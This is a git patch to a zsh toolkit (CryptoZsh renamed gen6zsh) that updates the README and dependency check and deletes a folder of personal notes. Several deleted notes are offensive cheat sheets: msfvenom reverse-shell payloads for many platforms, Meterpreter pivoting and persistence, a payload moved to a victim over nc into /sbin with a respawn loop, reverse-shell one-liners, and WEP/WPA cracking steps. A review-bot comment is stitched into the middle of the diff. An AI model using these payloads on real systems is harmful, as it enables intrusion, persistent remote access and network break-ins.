From f285d6831f8ae169b43bcc7d9f6f839b28e78eb6 Mon Sep 17 00:00:00 2001 
From: six Date: Mon, 14 Apr 2025 11:59:54 +0700 Subject: [PATCH] Gen6 tools --- README.md | 17 ++- dependency_check.zsh | 28 +++- tools/bcp.py | 102 -------------- tools/v3das/_n | 3 - tools/v3das/coding_python_venv.txt | 6 - tools/v3das/communication_xmpp_mcabber.txt | 42 ------ tools/v3das/linux_chroot_grub_install.txt | 12 -- .../linux_iptables_workstation_example.txt | 21 --- tools/v3das/linux_luks_pendrive.txt | 23 ---- tools/v3das/linux_zfs_debian7.txt | 64 --------- .../v3das/metasploit_meterpreter_pivoting.txt | 17 --- .../v3das/metasploit_msfvenom_cheatsheet.txt | 126 ------------------ tools/v3das/network_iptables.txt | 16 --- .../network_sniffing_tcpdump_examples.txt | 7 - .../network_sniffing_tshark_examples.txt | 11 -- tools/v3das/network_sniffing_wireshark.txt | 37 ----- tools/v3das/network_switch_cisco_reset.txt | 7 - .../network_wireless_cracking_aircrack.txt | 75 ----------- tools/v3das/shell_cheatsheet.txt | 32 ----- tools/v3das/web_file_inclusion.txt | 41 ------ tools/v3das/web_fuzz_strings.txt | 14 -- tools/v3das/web_injection_php.txt | 11 -- tools/v3das/web_injection_sqli.txt | 43 ------ tools/v3das/web_xss_cookie_stealing.txt | 3 - zsh_files/.zsh | 0 zsh_files/.zshrc | 3 - zsh_files/crypto.zsh | 15 +-- zsh_files/gen6.zsh | 47 +++++++ zsh_files/general.zsh | 16 ++- zsh_files/hacking.zsh | 1 - zsh_files/vedas.zsh | 25 ---- zsh_files/zshrc | 3 + 32 files changed, 95 insertions(+), 773 deletions(-) delete mode 100755 tools/bcp.py delete mode 100755 tools/v3das/_n delete mode 100755 tools/v3das/coding_python_venv.txt delete mode 100755 tools/v3das/communication_xmpp_mcabber.txt delete mode 100755 tools/v3das/linux_chroot_grub_install.txt delete mode 100755 tools/v3das/linux_iptables_workstation_example.txt delete mode 100755 tools/v3das/linux_luks_pendrive.txt delete mode 100755 tools/v3das/linux_zfs_debian7.txt delete mode 100755 tools/v3das/metasploit_meterpreter_pivoting.txt delete mode 100755 tools/v3das/metasploit_msfvenom_cheatsheet.txt 
delete mode 100755 tools/v3das/network_iptables.txt delete mode 100755 tools/v3das/network_sniffing_tcpdump_examples.txt delete mode 100755 tools/v3das/network_sniffing_tshark_examples.txt delete mode 100755 tools/v3das/network_sniffing_wireshark.txt delete mode 100755 tools/v3das/network_switch_cisco_reset.txt delete mode 100755 tools/v3das/network_wireless_cracking_aircrack.txt delete mode 100755 tools/v3das/shell_cheatsheet.txt delete mode 100755 tools/v3das/web_file_inclusion.txt delete mode 100755 tools/v3das/web_fuzz_strings.txt delete mode 100755 tools/v3das/web_injection_php.txt delete mode 100755 tools/v3das/web_injection_sqli.txt delete mode 100755 tools/v3das/web_xss_cookie_stealing.txt delete mode 100755 zsh_files/.zsh delete mode 100755 zsh_files/.zshrc create mode 100755 zsh_files/gen6.zsh delete mode 100755 zsh_files/hacking.zsh delete mode 100755 zsh_files/vedas.zsh create mode 100755 zsh_files/zshrc diff --git a/README.md b/README.md index 9e0c2cd..ac31a31 100755 --- a/README.md +++ b/README.md @@ -1,4 +1,4 @@ -CryptoZsh +gen6zsh ==== The aim of this project is to create a zsh environment for users who work with: cryptocurrencies, blockchain projects and crytpography itself. @@ -6,6 +6,7 @@ The aim of this project is to create a zsh environment for users who work with: Tools and Functions inside /draft/ ==== +- Check state of Gen6 services - Random generation rules - Network crypto tools - Logical note taking with linking @@ -21,8 +22,12 @@ Commands calling functions: Installing ==== -cd /tmp/ -git clone https://git.hsbp.org/Awalcon/CryptoZsh -cp CryptoZsh/zsh_files/.zshrc ~/ -cp -R CryptoZsh/zsh_files ~/.cryptozsh -cp -R CryptoZsh/tools ~/.cryptozsh_tools + +``` +cd /tmp/ && git clone https://git.hsbp.org/G6_Networks/gen6zsh && cd gen6zsh && mkdir ~/.gen6zsh && cp zsh_files/* ~/.gen6zsh && mv ~/.gen6zsh/zshrc ~/.zshrc && cp -R tools ~/.gen6zsh_tools +``` + +Check dependencies: +``` +zsh /tmp/gen6zsh/dependency_check.zsh +``` 
diff --git a/dependency_check.zsh b/dependency_check.zsh index 37ae91b..d9f0901 100755 --- a/dependency_check.zsh +++ b/dependency_check.zsh @@ -1,16 +1,32 @@ #!/bin/zsh -function chkdep { +# Dependency check for gen6zsh + +echo "Checking dependencies..." + +chkdep() { + # Web n code type python3 >/dev/null 2>&1 || { echo >&2 "python is missing."; } type wget >/dev/null 2>&1 || { echo >&2 "wget is missing."; } + type websocat >/dev/null 2>&1 || { echo >&2 "wget is missing."; } + + # G6 Substrate + # SS58 Converter: http://github.com/shamilsan/ss58.org + type subkey >/dev/null 2>&1 || { echo >&2 "wget is missing."; } type openssl >/dev/null 2>&1 || { echo >&2 "openssl is missing."; } - type john >/dev/null 2>&1 || { echo >&2 "john is missing."; } + type curl >/dev/null 2>&1 || { echo >&2 "curl is missing."; } + + # General tools type rar >/dev/null 2>&1 || { echo >&2 "rar is missing."; } type zip >/dev/null 2>&1 || { echo >&2 "zip is missing."; } type unzip >/dev/null 2>&1 || { echo >&2 "unzip is missing."; } - type tor >/dev/null 2>&1 || { echo >&2 "tor is missing."; } - type torsocks >/dev/null 2>&1 || { echo >&2 "torsocks is missing."; } type traceroute >/dev/null 2>&1 || { echo >&2 "traceroute is missing."; } - type curl >/dev/null 2>&1 || { echo >&2 "curl is missing."; } + + #secu + #type john >/dev/null 2>&1 || { echo >&2 "john is missing."; } + #type aircrack-ng >/dev/null 2>&1 || { echo >&2 "aircrack is missing."; } + #type tor >/dev/null 2>&1 || { echo >&2 "tor is missing."; } + #type torsocks >/dev/null 2>&1 || { echo >&2 "torsocks is missing."; } + } -chkdep() +chkdep diff --git a/tools/bcp.py b/tools/bcp.py deleted file mode 100755 index 8bf66fd..0000000 --- a/tools/bcp.py +++ /dev/null 
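Review bot: The two new checks for `websocat` and `subkey` in `chkdep` both print "wget is missing.", so a missing Substrate tool is reported under the wrong name and a user who already has wget gets no hint what to install. They should read `type websocat >/dev/null 2>&1 || { echo >&2 "websocat is missing."; }` and `type subkey >/dev/null 2>&1 || { echo >&2 "subkey is missing."; }`. Every check ends in an `echo`, so the script exits 0 even when tools are missing and the README's "Check dependencies" step cannot gate an install; counting the misses and returning non-zero from `chkdep` would fix that. The SS58 converter comment links over `http://`, and `https://` is the safer form for a URL that readers will fetch code from.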
@@ -1,102 +0,0 @@ -#!/usr/bin/python3 -import hashlib -import random -import sys - -## That part was originally secrets.py --> now bcp is integrated into a single file program -"""Generate cryptographically strong pseudo-random numbers suitable for -managing secrets such as account authentication, tokens, and similar. - -See PEP 506 for more information. -https://www.python.org/dev/peps/pep-0506/ - -Amit nem hasznalok belole azt kivettem! -Eredeti forras: https://raw.githubusercontent.com/python/cpython/3.7/Lib/secrets.py - -""" - -__all__ = ['choice', 'randbelow', 'randbits', 'SystemRandom', - 'token_bytes', 'token_hex', 'token_urlsafe', - 'compare_digest', - ] - -import base64 -import binascii -import os - -from hmac import compare_digest -from random import SystemRandom - -_sysrand = SystemRandom() - -randbits = _sysrand.getrandbits -choice = _sysrand.choice - -DEFAULT_ENTROPY = 64 # number of bytes to return by default - -def token_bytes(nbytes=None): - """Return a random byte string containing *nbytes* bytes. - >>> token_bytes(16) #doctest:+SKIP - b'\\xebr\\x17D*t\\xae\\xd4\\xe3S\\xb6\\xe2\\xebP1\\x8b'""" - if nbytes is None: - nbytes = DEFAULT_ENTROPY - return os.urandom(nbytes) - - -def token_hex(nbytes=None): - """Return a random text string, in hexadecimal. - >>> token_hex(16) #doctest:+SKIP - 'f9bf78b9a18ce6d46a0cd2b0b86df9da'""" - return binascii.hexlify(token_bytes(nbytes)).decode('ascii') -## End of integrated secrets.py - -# Az egyszeruseg kedveert, 1 tomb = 1 sor - -blokklanc_file = os.getenv("HOME") + "/.blokklanc.pp" - -# Eredet tomb letrehozasa ha nem letezik -if not os.path.exists(blokklanc_file): - # Genezis/eredet tomb letrehozasa randommal, hogy ha ugyan az is ket szoveg, soha ne ugyan az legyen a kimenetel - eredet = "Eredet." 
- erand = token_hex(64) - etomb_adat = eredet + erand - etomb_hash = hashlib.sha512(etomb_adat.encode('utf-8')).hexdigest() - print("Initializing...") - print("Origin block: " + str(etomb_adat) + '||' + etomb_hash) - # beirni eredetet - ask_for_write = input("Save the first block into " + blokklanc_file + "? [y/n] ") - if ask_for_write != "y": - sys.exit() - f = open(blokklanc_file,'w') - f.write(str(etomb_adat) + etomb_hash) - f.close() - - -# kiolvassa az utolso sort -def utolso_sor(): - blokk_file = open(blokklanc_file,'r') - for sor in blokk_file: - fb_sor = sor - print("Utolsó tömb: " + fb_sor) - return fb_sor - -# hozzaad egy uj tombot -def uj_tomb(tomb_adat): - utolso_tomb_hash = utolso_sor() - uj_tomb = hashlib.sha512(utolso_tomb_hash.encode('utf-8')).hexdigest() + '||' + tomb_adat + '||' - uj_tomb_hash = hashlib.sha512(uj_tomb.encode('utf-8')).hexdigest() - fu = open(blokklanc_file,'a') - fu.write('\n' + uj_tomb + uj_tomb_hash) - -# ujraszamolja a blokklanc helyesseget -def teljes_lanc_ellenorzes(): - pass -teljes_lanc_ellenorzes() - - -# Kovetkezo letrehozasa -jegyzet = input("What do you want to add to the blockchain? ") -uj_tomb(jegyzet) -#print("Teszt: " + hashlib.sha512("teszt".encode('utf-8')).hexdigest()) - -# cut -d '|' -f 3 blokklanc.pp | egrep -v "^Eredet." diff --git a/tools/v3das/_n b/tools/v3das/_n deleted file mode 100755 index 0b1b695..0000000 --- a/tools/v3das/_n +++ /dev/null @@ -1,3 +0,0 @@ -#compdef n - -_arguments "1: :( $(ls ~/.cryptozsh_tools/v3das/ ) )" diff --git a/tools/v3das/coding_python_venv.txt b/tools/v3das/coding_python_venv.txt deleted file mode 100755 index 4bee2e6..0000000 --- a/tools/v3das/coding_python_venv.txt +++ /dev/null @@ -1,6 +0,0 @@ -tl;dr the use of virtual env: - -# #! /usr/bin/env python -# . venv/bin/activate - - diff --git a/tools/v3das/communication_xmpp_mcabber.txt b/tools/v3das/communication_xmpp_mcabber.txt deleted file mode 100755 index 8bb9aa9..0000000 
--- a/tools/v3das/communication_xmpp_mcabber.txt +++ /dev/null @@ -1,42 +0,0 @@ -# mcabber is a great command line client to use for chat (XMPP) with authentication and encrytpion (OTR). - -# The following comments and commands will help you to install and use it. - -# Register your account -# Go to jit.si for example - -# Create directory for mcabber config and OTR -mkdir -p .mcabber/otr - -# Copy the sample configuration files -cp /usr/share/doc/mcabber/examples/mcabberrc.example.gz ~/. - -# If the files does not exist, the path may be different. -# Like "/usr/share/doc/mcabber/mcabberrc.example" - -# Unzip the configuration file and rename it -gunzip mcabberrc.example.gz -mv mcabberrc.example.gz .mcabberrc - -# Correct the priviliges if needed -chmod 700 .mcabber/ -R -chmod 700 .mcabberrc - -# Edit your configuration with the following settings: -vim .mcabberrc - set jid = testuser@jit.si - set otr = 1 - -# Start mcabber and login with the account you have registered -mcabber - -# Basic commands -/add user@jit.si # Request someone for chat -/event 1 accept # To accept a request - -# Using OTR -# It's recommended to add OTR by default policy to your config files -/otr key # Show your fingerprint -/otr fingerprint . "AAAA AAAA AAAA ...." # Trust someon's fingerprint -/otr fingerprint # Show fingerprints you have -/otr start # Start a conversation with OTR diff --git a/tools/v3das/linux_chroot_grub_install.txt b/tools/v3das/linux_chroot_grub_install.txt deleted file mode 100755 index 5763bbf..0000000 --- a/tools/v3das/linux_chroot_grub_install.txt +++ /dev/null @@ -1,12 +0,0 @@ - -# Start a live image, then reinstall grub. - -fdisk -l -mount /dev/sda2 /mnt/ -mount -t proc none /mnt/proc -mount -o bind /dev /mnt/dev -mount -t sysfs sys /mnt/sys -chroot /mnt/ /bin/bash -update-grub -/usr/sbin/grub-install --recheck --no-floppy /dev/sda -sync & reboot 
diff --git a/tools/v3das/linux_iptables_workstation_example.txt b/tools/v3das/linux_iptables_workstation_example.txt deleted file mode 100755 index 738e9b0..0000000 --- a/tools/v3das/linux_iptables_workstation_example.txt +++ /dev/null @@ -1,21 +0,0 @@ -#!/bin/bash -# Example iptables for workstation - -IPT=/sbin/iptables -$IPT -F - -#Policies -$IPT -P OUTPUT ACCEPT -$IPT -P INPUT DROP -$IPT -P FORWARD DROP - -#Allow IN for services -$IPT -A INPUT --in-interface lo -j ACCEPT - -#Allow response -$IPT -A INPUT -m state --state ESTABLISHED,RELATED -j ACCEPT - -# Block ipv6, sorry lazy to set path, its a note :) -ip6tables -P INPUT DROP 2>/dev/null -ip6tables -P FORWARD DROP 2>/dev/null -ip6tables -P OUTPUT DROP 2>/dev/null diff --git a/tools/v3das/linux_luks_pendrive.txt b/tools/v3das/linux_luks_pendrive.txt deleted file mode 100755 index f610c9e..0000000 --- a/tools/v3das/linux_luks_pendrive.txt +++ /dev/null @@ -1,23 +0,0 @@ -# CryptSetup for pendrive example - -# Creation, make sure no CBC is used anymore! -cryptsetup -c aes -s 256 luksFormat /dev/sdb2 -cryptsetup luksDump /dev/sdb2 # To check it! - -cryptsetup luksOpen /dev/sde usb1 -mkfs.vfat /dev/mapper/usb1 -n "usb1" - -# Troubleshoot if needed -dmsetup ls -dmsetup ls - -# Change Passphrse -cryptsetup -y luksAddKey ENCRYPTED_PARTITION -cryptsetup luksRemoveKey ENCRYPTED_PARTITION - -# Mount and unmount -cryptsetup luksOpen /dev/sdb2 usb1 -mount /dev/mapper/usb1 /mnt -umount /mnt/point - - diff --git a/tools/v3das/linux_zfs_debian7.txt b/tools/v3das/linux_zfs_debian7.txt deleted file mode 100755 index 226dad6..0000000 --- a/tools/v3das/linux_zfs_debian7.txt +++ /dev/null 
@@ -1,64 +0,0 @@ -# How to create ZFS mirroring on Debian 7 / Old notes! - -# Information were gathered from the following sites: -# http://zfsonlinux.org/debian.html -# http://www.zfsbuild.com/2010/06/03/howto-create-mirrored-vdev-zpool/ -# http://allgood38.io/setting-up-a-basic-linux-zfs-instance.html -# https://help.ubuntu.com/community/encryptedZfs -# http://linux.arantius.com/installing-gentoo-into-a-luks-encrypted-zfs-root -# -# CheatSheet: http://lildude.co.uk/zfs-cheatsheet - -# Get ZFS On Linux debian package, install it and add their GPG key to APT -su -wget http://archive.zfsonlinux.org/debian/pool/main/z/zfsonlinux/zfsonlinux_8_all.deb -dpkg -i zfsonlinux_8_all.deb -wget http://zfsonlinux.org/4D5843EA.asc -O - | apt-key add - - -# Install ZFS using APT -apt-get update -apt-get install debian-zfs - -# Create LUKS encrypted volumes -cryptsetup luksFormat /dev/sdc -cryptsetup luksFormat /dev/sdd - -# Open luks encrypted devices - those will be mirrored -cryptsetup luksOpen /dev/sdc luk1 -cryptsetup luksOpen /dev/sdd luk2 - -# Create the mirror pool using the opened luks devices -# WARNING -# THIS DESTROYES YOUR EXISTING POOL IF YOU ALREADY HAVE ONE! -zpool create -m none -O compression=lz4 m_pool mirror luk1 luk2 -# -m mountpoint -O -# END OF CREATION -# Done! - -# The following part is required for mounting/opening our ZFS mirror. - -# Import the pool if it's not already -zpool import m_pool - -# Mount it manually -zfs set mountpoint=/mpool m_pool - -# Checks -zpool list -zpool iostat -zpool status - - --------- - -# Finally change privileges if needed -chown -R storager:storager /mpool - -# Create ZFS filesystem -zfs create tank/testfs - - --------- - -# Destory -zpool destroy m_pool diff --git a/tools/v3das/metasploit_meterpreter_pivoting.txt b/tools/v3das/metasploit_meterpreter_pivoting.txt deleted file mode 100755 index 995512a..0000000 --- a/tools/v3das/metasploit_meterpreter_pivoting.txt +++ /dev/null 
@@ -1,17 +0,0 @@ -# With "autoroute" it is possible to attack through the remote machine. - -# Start handler -use exploit/multi/handler -set payload windows/meterpreter/reverse_tcp -set lhost 10.1.1.1 - -# Add route to which network you want to look into -run autoroute -s 10.2.2.0/24 -run autoroute -p - -# Scan -use auxiliary/scanner/portscan/tcp -set RHOSTS 10.2.2.0/24 -set THREADS 50 -set ports 20,21,22,25,53,69,80,139,443,445,993,8080 - diff --git a/tools/v3das/metasploit_msfvenom_cheatsheet.txt b/tools/v3das/metasploit_msfvenom_cheatsheet.txt deleted file mode 100755 index 95c6d72..0000000 --- a/tools/v3das/metasploit_msfvenom_cheatsheet.txt +++ /dev/null 
@@ -1,126 +0,0 @@ -C0nn3ctz msfvenom payload backdoor veil - -List payloads -msfvenom -l - -# The script way to make life more simple -theip=0.0.0.0 -theport=443 - - -Binaries and libs -================= - -Linux -msfvenom -p linux/x86/meterpreter/reverse_tcp LHOST=$theip LPORT=$theport -f elf > shell.elf -msfvenom -p linux/x64/shell/reverse_tcp LHOST=$theip LPORT=$theport -f elf > shell.elf - -Windows -msfvenom -p windows/meterpreter/reverse_tcp LHOST=$theip LPORT=$theport -f exe > shell.exe -msfvenom -a x86 --platform windows -p windows/shell/reverse_tcp LHOST=$theip LPORT=$theport -f exe -o shell.exe # STAGED, use this with msf -msfvenom -a x86 -p windows/shell_reverse_tcp LHOST=$theip LPORT=$theport -f exe -o shell.exe # NON-STAGED -msfvenom -p windows/x64/exec cmd="cmd /c calc.exe" -f dll > d3d9.dll -msfvenom -p windows/exec CMD="cmd /c calc.exe" -f dll > d3d9.dll -msfvenom -p cmd/windows/powershell_reverse_tcp LHOST=$theip LPORT=$theport - -Mac -msfvenom -p osx/x86/shell_reverse_tcp LHOST=$theip LPORT=$theport -f macho > shell.macho - - - -Web Payloads -============ - -PHP -msfvenom -p php/meterpreter_reverse_tcp LHOST=$theip LPORT=$theport -f raw > shell.php -cat shell.php | pbcopy && echo ' shell.php && pbpaste >> shell.php - -ASP -msfvenom -p windows/meterpreter/reverse_tcp LHOST=$theip LPORT=$theport -f asp > shell.asp - -JSP -msfvenom -p java/jsp_shell_reverse_tcp LHOST=$theip LPORT=$theport -f raw > shell.jsp - -WAR -msfvenom -p java/jsp_shell_reverse_tcp LHOST=$theip LPORT=$theport -f war > shell.war - -JavaScript -msfvenom -p windows/meterpreter/reverse_tcp LHOST=1.1.1.1 LPORT=1 -f js_le - - - -Scripting Payloads -================== - -Python -msfvenom -p cmd/unix/reverse_python LHOST=$theip LPORT=$theport -f raw > shell.py - -Bash -msfvenom -p cmd/unix/reverse_bash LHOST=$theip LPORT=$theport -f raw > shell.sh - -Perl -msfvenom -p cmd/unix/reverse_perl LHOST=$theip LPORT=$theport -f raw > shell.pl # For Linux -msfvenom -p 
cmd/windows/reverse_perl=$theip LPORT=$theport -f raw > shell.pl # For Windows - - - -Shellcode -========= - -For all shellcode see ‘msfvenom –help-formats’ for information as to valid parameters. Msfvenom will output code that is able to be cut and pasted in this language for your exploits. - -Linux Based Shellcode -msfvenom -p linux/x86/meterpreter/reverse_tcp LHOST=$theip LPORT=$theport -f - -Windows Based Shellcode -msfvenom -p windows/meterpreter/reverse_tcp LHOST=$theip LPORT=$theport -f -msfvenom -p windows/shell/reverse_tcp LHOST=192.168.1.1 LPORT=443 -f c -msfvenom -p windows/shell/bind_tcp -f perl --smallest # Default port is 4444 and with --smallest msfvenom tries to make it small - -Mac Based Shellcode -msfvenom -p osx/x86/shell_reverse_tcp LHOST=$theip LPORT=$theport -f - - - -Handler -======= - -Metasploit handlers can be great at quickly setting up Metasploit to be in a position to receive your incoming shells. Handlers should be in the following format. - -use exploit/multi/handler -set PAYLOAD cmd/windows/powershell_reverse_tcp -set LHOST 0.0.0.0 -set LPORT 443 -set ExitOnSession false -exploit -j -z - -Once the required values are completed the following command will execute your handler – ‘msfconsole -L -r ‘ - - - -Persistence -=========== -meterpreter > run persistence - - - -UUID Payload -============ - -# Create payload -msfvenom -p linux/x86/meterpreter/reverse_tcp_uuid LHOST=domainzz.com  LPORT=53 PayloadUUIDTracking=true PayloadUUIDName=HAXHAXHAXHAX -f elf > hipchat - -# Setup msf listener -set payload linux/x86/meterpreter/reverse_tcp_uuid -set payloadUUIDName HAXHAXHAXHAX -set PayloadUUIDTracking true -run -j  - -# Move to vict -cat hipchat.elf |ncat --ssl -lvp 53 -nc --ssl domainzz.com 53 > /sbin/lister -chmod +x /sbin/lister - -# crontab alternatively: -if ps aux|grep /sbin/hipchat |grep -v grep; then sleep 1 ; else /sbin/hipchat ; fi - 
diff --git a/tools/v3das/network_iptables.txt b/tools/v3das/network_iptables.txt deleted file mode 100755 index 71739ac..0000000 --- a/tools/v3das/network_iptables.txt +++ /dev/null @@ -1,16 +0,0 @@ -#!/bin/bash -# Desktop example -> just like in the LWHP repo - -IPT=/sbin/iptables -$IPT -F - -#Policies -$IPT -P OUTPUT ACCEPT -$IPT -P INPUT DROP -$IPT -P FORWARD DROP - -#Allow IN for services -$IPT -A INPUT --in-interface lo -j ACCEPT - -#Allow response -$IPT -A INPUT -m state --state ESTABLISHED,RELATED -j ACCEPT diff --git a/tools/v3das/network_sniffing_tcpdump_examples.txt b/tools/v3das/network_sniffing_tcpdump_examples.txt deleted file mode 100755 index 264636a..0000000 --- a/tools/v3das/network_sniffing_tcpdump_examples.txt +++ /dev/null @@ -1,7 +0,0 @@ - -tcpdump -r file.cap -vvvs 1024 -l -A host example.com | grep -i cookie -tcpdump -r file.cap -vvvs 1024 -l -A | egrep -i "host:|cookie:" -tcpdump -r file.cap -s 1024 -l -A dst domain.com - -tcpdump -A # show raw data - diff --git a/tools/v3das/network_sniffing_tshark_examples.txt b/tools/v3das/network_sniffing_tshark_examples.txt deleted file mode 100755 index cf685d2..0000000 --- a/tools/v3das/network_sniffing_tshark_examples.txt +++ /dev/null @@ -1,11 +0,0 @@ - -# tshark follow stream -tshark -r -R "" -T fields -e tcp.stream -tshark -q -r http.pcapng -z follow,tcp,ascii,1 - -# etc -tshark grep from http -tshark -r file.cap 'http' | egrep -i "login|pass" -tshark 'tcp port 80 and (((ip[2:2] - ((ip[0]&0xf)<<2)) - ((tcp[12]&0xf0)>>2)) != 0)' -tshark 'tcp port 80 and (((ip[2:2] - ((ip[0]&0xf)<<2)) - ((tcp[12]&0xf0)>>2)) != 0)' -R'http.request.method == "GET" || http.request.method == "HEAD"' - diff --git a/tools/v3das/network_sniffing_wireshark.txt b/tools/v3das/network_sniffing_wireshark.txt deleted file mode 100755 index 006832d..0000000 --- a/tools/v3das/network_sniffing_wireshark.txt +++ /dev/null 
@@ -1,37 +0,0 @@ -C0nn3ctz sniffing wireshark network - -IP address -ip.addr == 192.168.1.1 -ip.src == 192.168.1.1 -ip.dst == 192.168.1.1 - -Show only tcp port 110 -tcp.port eq 110 - -Show only tcp and udp port 110 -tcp.port eq 110 || udp.port eq 110 - -Follow TCP stream -tcp.stream eq 0 - -Show only TCP -tcp - -Show only ARP -arp - -Show only HTTP -http - -Show only HTTP or ARP -http||arp - - -HTTP and ip.src -http&&ip.src==192.168.1.4 - -HTTP POST -http:.request.method == "POST" - -etc -(ip.addr==192.168.1.0/24) and (ip.src!=192.168.1.2)and (ip.dst!=192.168.1.4) diff --git a/tools/v3das/network_switch_cisco_reset.txt b/tools/v3das/network_switch_cisco_reset.txt deleted file mode 100755 index a2310d5..0000000 --- a/tools/v3das/network_switch_cisco_reset.txt +++ /dev/null @@ -1,7 +0,0 @@ - -# reset a cisco switch -flash_init -dir flash: -rename flash:config.text flash:config.backup -boot - diff --git a/tools/v3das/network_wireless_cracking_aircrack.txt b/tools/v3das/network_wireless_cracking_aircrack.txt deleted file mode 100755 index d8fca42..0000000 --- a/tools/v3das/network_wireless_cracking_aircrack.txt +++ /dev/null 
@@ -1,75 +0,0 @@ -# cracking WEP with clients -airmon-ng start wlan0 $AP_CHANNEL -airodump-ng -c $AP_CHANNEL --bssid $AP_MAC -w $FILENAME mon0 -aireplay-ng -1 0 -e $AP_ESSID -a $AP_MAC -h $SELF_MAC mon0 # Fake-auth -aireplay-ng -3 -b $AP_MAC -h $SELF_MAC mon0 # ARP Replay attack -aireplay-ng -0 1 -a $AP_MAC -c $CLIENT_MAC mon0 # Deauthentication to get an ARP packet faster -aircrack-ng -0 $CAP_FILE - - -# cracking WEP via a client -airmon-ng start wlan0 $AP_CHANNEL -airodump-ng -c $AP_CHANNEL --bssid $AP_MAC -w $FILENAME mon0 -aireplay-ng -1 0 -e $AP_ESSID -a $AP_MAC -h $SELF_MAC mon0 # Fake auth -aireplay-ng -2 -b $AP_MAC -d FF:FF:FF:FF:FF:FF -f 1 -m 68 -n 86 mon0 # Interactive packet reply attack -aircrack-ng -0 -z -n 64 $CAP_FILE - - -# clientless WEP cracking -airmon-ng start wlan0 $AP_CHANNEL -airodump-ng -c $AP_CHANNEL --bssid $AP_MAC -w $FILENAME mon0 -aireplay-ng -1 0 -e $AP_ESSID -a $AP_MAC -h $SELF_MAC mon0 # Fake-auth -aireplay-ng -5 -b $AP_MAC -h $SELF_MAC mon0 # Fragmentation attack for PRGA -aireplay-ng -4 -b $AP_MAC -h $SELF_MAC mon0 # If Frag attack fails, use Korek ChopChop attack for PRGA -packetforge-ng -0 -a $AP_MAC -h $SELF_MAC -l $SOURCE_IP -k $DESTINATION_IP -y $XOR_FILENAME -w $PACKET_FILENAME # After got PRGA -aireplay-ng -2 -r $PACKET_FILENAME mon0 # Interactive packet reply after crafted the packet -aircrack-ng -0 $CAP_FILE - - -# bypassing WEP SKA -airmon-ng start wlan0 $AP_CHANNEL -airodump-ng -c $AP_CHANNEL --bssid $AP_MAC -w $FILENAME mon0 -aireplay-ng -0 1 -a $AP_MAC -c $CLIENT_MAC mon0 # Deauthentication attack for PRGA xor file -aireplay-ng -1 60 -e $AP_ESSID -y $PRGA_FILENAME -a $AP_MAC -h $SELF_MAC mon0 # Shared key fake auth attack -aireplay-ng -3 -b $AP_MAC -h $SELF_MAC mon0 # ARP Replay attack -aireplay-ng -0 1 -a $AP_MAC -c $CLIENT_MAC mon0 # Deauthentication to get an ARP packet faster -aircrack-ng -0 -z -n 64 $CAP_FILE - - -# cracking WPA PSK -airmon-ng start wlan0 $AP_CHANNEL -airodump-ng -c $AP_CHANNEL --bssid $AP_MAC -w 
$FILENAME mon0 -aireplay-ng -0 1 -a $AP_MAC -c $CLIENT_MAC mon0 # Deauthentication to get a 4 way handshake -airacrack-ng -0 -w $WORDLIST $CAPTURE_FILE - - -# cracking WPA with John The Ripper -airmon-ng start wlan0 $AP_CHANNEL -airodump-ng -c $AP_CHANNEL --bssid $AP_MAC -w $FILENAME mon0 -aireplay-ng -0 1 -a $AP_MAC -c $CLIENT_MAC mon0 # Deauthentication to get a 4 way handshake -# change to password folder -vim john.conf # Edit "List.Rules:Wordlist" --> add regex for more words eg. "$[0-9]$[0-9]" -./john --worldlist=$WORDLIST --rules --stdout | aircrack-ng -0 -e $AP_ESSID -w $CAPTURE_FILE - - -# cracking WPA with coWPAtty -airmon-ng start wlan0 $AP_CHANNEL -airodump-ng -c $AP_CHANNEL --bssid $AP_MAC -w $FILENAME mon0 -aireplay-ng -0 1 -a $AP_MAC -c $CLIENT_MAC mon0 # Deauthentication to get a 4 way handshake -cowpatty -r $CAPTURE_FILE -f $WORDLIST -2 s $AP_ESSID -genpmk -f $WORDLIST -d HASH_FILENAME -s $AP_ESSID # Gen WPA hashes for rainbow attack -cowpatty -r $CAPTURE_FILE -d HASH_FILENAME -2 -s $AP_ESSID # Start the rainbow attack - - -# cracking WPA with pyrit -airmon-ng start wlan0 $AP_CHANNEL -airodump-ng -c $AP_CHANNEL --bssid $AP_MAC -w $FILENAME mon0 -aireplay-ng -0 1 -a $AP_MAC -c $CLIENT_MAC mon0 # Deauthentication to get a 4 way handshake -pyrit list_cores -pyrit -r $CAPTURE_FILE -i $WORDLIST -b $AP_MAC attack_passthrough - -pyrit -i $WORDLIST import_password # Import the wordlist to the database -pyrit -e $AP_ESSID create_essid # Add ESSID to the database -pyrit batch -pyrit -r $CAPTURE_FILE attack_db - diff --git a/tools/v3das/shell_cheatsheet.txt b/tools/v3das/shell_cheatsheet.txt deleted file mode 100755 index c48abdd..0000000 --- a/tools/v3das/shell_cheatsheet.txt +++ /dev/null 
@@ -1,32 +0,0 @@ - -Shell cheatsheet -================ - -Bash -bash -i >& /dev/tcp/HOST/PORT 0>&1? - -Perl -perl -e 'use Socket;$i="10.0.0.1";$p=1234;socket(S,PF_INET,SOCK_STREAM,getprotobyname("tcp"));if(connect(S,sockaddr_in($p,inet_aton($i)))){open(STDIN,">&S");open(STDOUT,">&S");open(STDERR,">&S");exec("/bin/sh -i");};' - -Python -python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("10.0.0.1",1234));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);' - -PHP -php -r '$sock=fsockopen("10.0.0.1",1234);exec("/bin/sh -i <&3 >&3 2>&3");' - -Ruby -ruby -rsocket -e'f=TCPSocket.open("10.0.0.1",1234).to_i;exec sprintf("/bin/sh -i <&%d >&%d 2>&%d",f,f,f)' - -nc -nc -e /bin/sh 10.0.0.1 1234 - -Java -r = Runtime.getRuntime() -p = r.exec(["/bin/bash","-c","exec 5<>/dev/tcp/10.0.0.1/2002;cat <&5 | while read line; do \$line 2>&5 >&5; done"] as String[]) -p.waitFor() - -More info and tips -http://pentestmonkey.net/cheat-sheet/shells/reverse-shell-cheat-sheet -http://www.gnucitizen.org/blog/reverse-shell-with-bash/#comment-122387 -http://unix.stackexchange.com/questions/116010/meaning-of-bash-i-dev-tcp-host-port-01 - diff --git a/tools/v3das/web_file_inclusion.txt b/tools/v3das/web_file_inclusion.txt deleted file mode 100755 index c4e4c7e..0000000 --- a/tools/v3das/web_file_inclusion.txt +++ /dev/null 
